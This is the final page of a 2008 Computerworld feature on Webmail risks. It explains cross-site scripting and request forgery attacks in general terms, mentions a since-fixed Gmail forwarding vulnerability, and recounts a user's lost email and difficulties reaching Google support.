The darker side of Webmail

Web-based e-mail may be exposing you to privacy and security problems you didn't expect

1 2 3 Page 3
Page 3 of 3

Webmail is different

However, there's no denying that Webmail, because it is a Web application, is subject to attacks from black-hat hackers looking for vulnerable targets. "It's the law of large numbers," says Ponemon. "The seriously bad criminals -- computer jocks in places like Romania and China -- they look for the big brands because that's where they'll get the most traction from their criminal activity."

The two most prevalent vulnerabilities today are cross-site scripting and cross-site request forgeries, according to Petkov. In fact, cross-site scripting is the most prominent vulnerability on the Web, notes Grossman. "It's what's used most often to break into Webmail accounts specifically."

In Webmail cross-site scripting, a cybercriminal will send an e-mail that contains some malicious HTML and JavaScript code in it. When the victim opens that Webmail message, the code automatically executes and sends their cookies, which contain the information needed to get access to that Webmail account, back to the bad guys. Once that happens, the criminals "have everything they need to log in as you," says Grossman. "There's not much you can do about it."

Cross-site request forgery uses cross-site scripting as its first step, says Petkov, but it goes further and uses that info to impersonate the victim to gain access to other accounts. Last fall, Petrov reported a Gmail vulnerability that could allow a hacker to use cross-site request forgery to log into your e-mail account and configure it to forward copies of all your e-mails to the attacker's address. Or they might configure it to simply send copies of all e-mails that contain words like "account number" or "password," which might deliver the information needed to sign into the victim's bank account. Most users would never even realize this was happening -- that is, until they logged into their bank account and found it had been drained.

Google fixed the vulnerability (although, according to Petkov, it wasn't a complete fix and some users were compromised). And Petkov isn't singling out Google for special criticism. All Webmail vendors are engaged in a constant battle against these and other types of exploits, he says. "I'm sure Google is putting a lot of effort into securing their software, but mistakes happen," Petkov notes. "Especially on the Web, where everything is constantly changing and people are always striving to add new features. Every time they add a new feature, there could be a problem."

This is your life on a server

Finally, what can you do if you have a problem with Webmail? For example, if your e-mails disappear.

That's what happened to Jeneane D. Sessum, a writer and consultant in Atlanta who uses Gmail and several other Google Web-based applications. Last November, a large chunk of the e-mail messages she had stored on Google's server simply disappeared. When she tried to contact Google support, she was directed to its online help forums. She couldn't find an answer there. Then she filled out a contact form to report a technical problem. In reply, she received a form e-mail saying that Google had determined that there was no outage or data problem that would have caused her e-mail to vanish. "That was it," says Sessum. "No advice on what to do." She had to work through her own personal network to reach an actual person at Google, someone in technical support. "But still nobody could tell me anything except that nothing was wrong on their end."

Sessum wishes Google could be more responsive, especially to users like her who are basing their small businesses on its platforms. "I don't buy this line that these are free services and so you get what you pay for," she says. "They make money off of me by serving ads up every time I send an e-mail." She says she'd gladly pay Google some type of premium fee that would get her better support and perhaps guaranteed backups of her e-mail.

Google's Grant won't discuss individual problems like Sessum's, citing user privacy. Google can sometimes restore deleted e-mail, she says, depending on how much time has passed. Ultimately, Google permanently deletes it, but she won't specify the amount of time that Google waits before doing that. "We must strike this balance between, on the one hand, keeping that e-mail around just in case of situations like this so that we could recover the e-mail for the user and, on the other hand, doing what the user has told us to do when they tell us to delete the e-mail," she says.

Tellingly, Sessum still uses Gmail and her other Google apps. Indeed, most users seem willing to accept the trade-offs in exchange for the features, usability and accessibility of these services.

Sessum, for example, admits that she should have been more conscientious about keeping her own backup of her Gmails. Ironically, she's configured her Gmail account to forward a copy of everything to her Yahoo Mail. "So my backup to my Web-based e-mail is another Web-based e-mail account," she admits.

Tam Harbert is a Washington-based freelance journalist. Her last piece for Computerworld was Confessions of a Cobol programmer.

Copyright © 2008 IDG Communications, Inc.

1 2 3 Page 3
Page 3 of 3
  
Shop Tech Products at Amazon